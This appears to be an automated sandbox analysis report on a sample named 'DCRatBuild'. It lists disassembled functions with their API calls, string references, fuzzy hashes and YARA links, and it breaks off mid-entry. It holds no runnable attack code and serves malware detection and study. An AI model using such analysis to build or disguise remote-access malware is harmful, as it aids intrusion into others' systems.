Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 54302400ff2df9072719de2f9aa89a2406c8914bdc2602befda13726c126d0f0
Instruction ID: 195c25ae05d96087e4c06264a5e4f539f779569ab6a612b3d9bd7cf7705a63b9
Opcode Fuzzy Hash: 54302400ff2df9072719de2f9aa89a2406c8914bdc2602befda13726c126d0f0
Instruction Fuzzy Hash: 94414772900209AFCF15DF98CD81AEEBBB5BF48304F198059F904A7222D736AA50EF50

Function 00077401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00077406

Part of subcall function 00073BBA: __EH_prolog.LIBCMT ref: 00073BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 000774CD

Part of subcall function 00077A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00077AAB
Part of subcall function 00077A9C: GetLastError.KERNEL32 ref: 00077AF1
Part of subcall function 00077A9C: CloseHandle.KERNEL32(?), ref: 00077B00

Strings

SeRestorePrivilege, xrefs: 00077460
SeSecurityPrivilege, xrefs: 0007744B

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 07a447801bd1ae50df62d5470bfbc06b62b74a3438bcb379bac9ac46d6040d0f
Instruction ID: a0b720600e92f108e9122ceb11d8a04681ec98a585e8e8a97435025745b4dae4
Opcode Fuzzy Hash: 07a447801bd1ae50df62d5470bfbc06b62b74a3438bcb379bac9ac46d6040d0f
Instruction Fuzzy Hash: C631B471D04248AAEF51EBA4CC45BEE7BB8AF45344F048015F84DA7183D7BC8A44CB65

Function 0008AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00071316: GetDlgItem.USER32(00000000,00003021), ref: 0007135A
Part of subcall function 00071316: SetWindowTextW.USER32(00000000,000A35F4), ref: 00071370

EndDialog.USER32(?,00000001), ref: 0008AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0008ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0008ADC2

Strings

ASKNEXTVOL, xrefs: 0008AD28

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 675931a233735346b42c70950a0cbdf094c33f1802d6d9a65db86c339b2d6c10
Instruction ID: ac2e244f2ad6a793c4bb52743cb153ee10fd84b275c61d84d2fe05fe5947802a
Opcode Fuzzy Hash: 675931a233735346b42c70950a0cbdf094c33f1802d6d9a65db86c339b2d6c10
Instruction Fuzzy Hash: BF11B732745300BFF261AF58DD05FAA7B99BB4B742F004012F682DA9A1CB6599059736

Function 0007D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0007D954
_strncpy.LIBCMT ref: 0007D99A

Part of subcall function 00081DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,000B1030,?,0007D928,00000000,?,00000050,000B1030), ref: 00081DC4

Strings

$%s, xrefs: 0007D949
@%s, xrefs: 0007D93E

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: ef367c65f135ff8645fbc0e131d2ce8cde4357ed12cc0c8999f5a1cd647b75f3
Instruction ID: c2bad96159f5af91d4181feb460d8836ca481d25a9e2d4e73c7ce01b82c18336
Opcode Fuzzy Hash: ef367c65f135ff8645fbc0e131d2ce8cde4357ed12cc0c8999f5a1cd647b75f3
Instruction Fuzzy Hash: 0821A27294024CAEDF21EEA4CC01FDE7BF8AF05700F048122FA589A1A2E276D649DB55

Function 00080E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0007AC5A,00000008,?,00000000,?,0007D22D,?,00000000), ref: 00080E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0007AC5A,00000008,?,00000000,?,0007D22D,?,00000000), ref: 00080E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0007AC5A,00000008,?,00000000,?,0007D22D,?,00000000), ref: 00080E9F

Strings

Thread pool initialization failed., xrefs: 00080EB7

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 754da37d0ef3339ad86f2a2253dd21637dcebe9df45a72b71ee31538c3481bd4
Instruction ID: 051999f24947fc6ccbb15cee1ecf603ef55aedaa37057521019e258a9504c4e9
Opcode Fuzzy Hash: 754da37d0ef3339ad86f2a2253dd21637dcebe9df45a72b71ee31538c3481bd4
Instruction Fuzzy Hash: 811191B16007089FD3716F6A9C849A7FBECFB65744F108C2EF1DAC2201D6B559408B54

Function 0008B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00071316: GetDlgItem.USER32(00000000,00003021), ref: 0007135A
Part of subcall function 00071316: SetWindowTextW.USER32(00000000,000A35F4), ref: 00071370

EndDialog.USER32(?,00000001), ref: 0008B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0008B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0008B304

Strings

GETPASSWORD1, xrefs: 0008B289

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 31e2918c9c51cba061967a330ee2f18811db7a9e7d58063ec2d86baa6f621c00
Instruction ID: 00d764c79142f5695f905ac9dcbd243eabab9a9fc46524ab6e7e7b9767f1de3c
Opcode Fuzzy Hash: 31e2918c9c51cba061967a330ee2f18811db7a9e7d58063ec2d86baa6f621c00
Instruction Fuzzy Hash: 6B11C432900119B6DB61BB649C49FFF7BACFF59710F004021FA85B61C0C7A89A459771

Function 0008DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 0008DD31
REPLACEFILEDLG, xrefs: 0008DD1C, 0008DD50

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: e95a59eab52fe6b8e50ff0c56fb4397ecf542b22fd10090798854350119b352b
Instruction ID: b413692f469ae44dde1d9b515ff946f87637b1b4ff14af440a126a05f65572ed
Opcode Fuzzy Hash: e95a59eab52fe6b8e50ff0c56fb4397ecf542b22fd10090798854350119b352b
Instruction Fuzzy Hash: 37019A36604345AFEB60AFA4FC44EDA7BA8F719354B004626F945832B1D7389850DBE0

Function 00099A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00099AA9
__alldvrm.LIBCMT ref: 00099CAA
__alldvrm.LIBCMT ref: 00099CCC

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: 51196e3e65724274bd04450786b471b213a6386a263617d46c737971d041f830
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: 44A145B2A043869FEF21CF6CC8917AEBBE5EF55310F18416DE4959B282C2399D41E750

Function 0007A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00077F69,?,?,?), ref: 0007A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00077F69,?), ref: 0007A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00077F69,?,?,?,?,?,?,?), ref: 0007A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00077F69,?,?,?,?,?,?,?,?,?,?), ref: 0007A4C6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 46101da160cde3f9f6a5bbc5854aa36ea7b8bd419dadeebab56571ce83ccaabd
Instruction ID: 00e1854f15513647baa112ab39ffe1f91af0563b5106277dd56cf23e88324684
Opcode Fuzzy Hash: 46101da160cde3f9f6a5bbc5854aa36ea7b8bd419dadeebab56571ce83ccaabd
Instruction Fuzzy Hash: 3341D231A483819AE731DF24DC49FDFBBE8AFC6300F04891DB5D893181D6A89A48DB57

Function 00071100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0007112B
_wcslen.LIBCMT ref: 00071153
_wcslen.LIBCMT ref: 00071182
_wcslen.LIBCMT ref: 000711A9

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 9f60ecc8a3ca63c9aa76b1dc7698a72a218580548f1ec654a8c3dec09bec3b97
Instruction ID: e609a5baf6ed9e33e026cd22c89a4079952c6ff97fbe4baa430f829a2b16590e
Opcode Fuzzy Hash: 9f60ecc8a3ca63c9aa76b1dc7698a72a218580548f1ec654a8c3dec09bec3b97
Instruction Fuzzy Hash: 3D41B671D006695BDB61AF688C199EE7BB8EF01310F00402AFD45F7282DB34AE598BA5

Function 0009C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,000947C6,00000000,00000000,000957FB,?,000957FB,?,00000001,000947C6,2DE85006,00000001,000957FB,000957FB), ref: 0009C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0009CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0009CA70
__freea.LIBCMT ref: 0009CA79

Part of subcall function 00098E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00094286,?,0000015D,?,?,?,?,00095762,000000FF,00000000,?,?), ref: 00098E38

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 8717fddaeb8c9ffe72bf12c9630b0313b5195dadfa201ac308412cca1a56f65b
Instruction ID: 8260c16dd17be75cfd34a44b39870fe7ded6f064f01be06cab4d9b1398af0a79
Opcode Fuzzy Hash: 8717fddaeb8c9ffe72bf12c9630b0313b5195dadfa201ac308412cca1a56f65b
Instruction Fuzzy Hash: 9D31AD72E0020AABEF24DF64DC45DEE7BA5EB01324B044228FC04E6251EB35CD50EB91

Function 0008A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0008A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0008A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0008A683
ReleaseDC.USER32(00000000,00000000), ref: 0008A691

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: da5509a12ad523cd9757e482a40110b6e97632eb3521d456627f8bad7a43f2c9
Instruction ID: 801b92a282d75a2743393a61a5508631f40edeece88a58cc69ce7a99e3879ee8
Opcode Fuzzy Hash: da5509a12ad523cd9757e482a40110b6e97632eb3521d456627f8bad7a43f2c9
Instruction Fuzzy Hash: 8DE0EC31943721A7F3615B60AC1DBCB3F58AF05B52F054212FF05961A0DB7C86008BB6

Function 0008A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0008A699: GetDC.USER32(00000000), ref: 0008A69D
Part of subcall function 0008A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0008A6A8
Part of subcall function 0008A699: ReleaseDC.USER32(00000000,00000000), ref: 0008A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0008A83C

Part of subcall function 0008AAC9: GetDC.USER32(00000000), ref: 0008AAD2
Part of subcall function 0008AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0008AB01
Part of subcall function 0008AAC9: ReleaseDC.USER32(00000000,?), ref: 0008AB99

Strings

(, xrefs: 0008A9AA

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: e2dfce16222778153d61a60104e28c6951ca0f43368f95c138cd0fc6ed0f3915
Instruction ID: caad399a2df01980b8b46e91969d2d191901496cd787974d5fc15131c7b9e1db
Opcode Fuzzy Hash: e2dfce16222778153d61a60104e28c6951ca0f43368f95c138cd0fc6ed0f3915
Instruction Fuzzy Hash: EC91E371608754AFE710DF25C844A2BBBE8FFCA710F00491EF99AD7260DB35A945CB62

Function 0009B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0009B324

Part of subcall function 00099097: IsProcessorFeaturePresent.KERNEL32(00000017,00099086,00000000,00098D94,00000000,00000000,00000000,00000016,?,?,00099093,00000000,00000000,00000000,00000000,00000000), ref: 00099099
Part of subcall function 00099097: GetCurrentProcess.KERNEL32(C0000417,00098D94,00000000,?,00000003,00099868), ref: 000990BB
Part of subcall function 00099097: TerminateProcess.KERNEL32(00000000,?,00000003,00099868), ref: 000990C2

Strings

*?, xrefs: 0009B1FB
., xrefs: 0009B4DB

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction ID: b99b42cc18d2545bf42a624965e6469cfaa59e6b167dde747b2f7fb2c2cf50a1
Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction Fuzzy Hash: 76517F71E0020AAFDF14DFA8D981AADBBF5EF98324F248169E854E7341E7359A019B50

Function 000775DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000775E3

Part of subcall function 000805DA: _wcslen.LIBCMT ref: 000805E0

Part of subcall function 0007A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0007A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0007777F

Part of subcall function 0007A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0007A325,?,?,?,0007A175,?,00000001,00000000,?,?), ref: 0007A501
Part of subcall function 0007A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0007A325,?,?,?,0007A175,?,00000001,00000000,?,?), ref: 0007A532

Strings

:, xrefs: 00077654

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 14efdb4a62fcdc37ab72d453466f9ef451127c6901500a10992c014d9793f492
Instruction ID: 8ac3bb3d96082c1312e5e06c65eedeed21c8d4b2baf66cca6f360de8f417f028
Opcode Fuzzy Hash: 14efdb4a62fcdc37ab72d453466f9ef451127c6901500a10992c014d9793f492
Instruction Fuzzy Hash: F4417071D05558AAEB35EB64CC59EEEB3B8AF41340F008096B64DA3093DB785F88CB75

Function 0007B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0007B438
_wcschr.LIBVCRUNTIME ref: 0007B478

Strings

*, xrefs: 0007B38A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: 2070090357403233234e637dcac522e0a2e2ee8ea2b807e49e464728dfc1662a
Instruction ID: aa4b03f9ba0a5ffad4141d2eae0d26023168ceb8a50c1226665ebc900acf17e8
Opcode Fuzzy Hash: 2070090357403233234e637dcac522e0a2e2ee8ea2b807e49e464728dfc1662a
Instruction Fuzzy Hash: 6D313872D44301AACB70AE548902BBB73E4EFA1B14F15C01EF98C57143E76EDD829369

Function 0008B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0008B4E3
_wcslen.LIBCMT ref: 0008B4FE

Strings

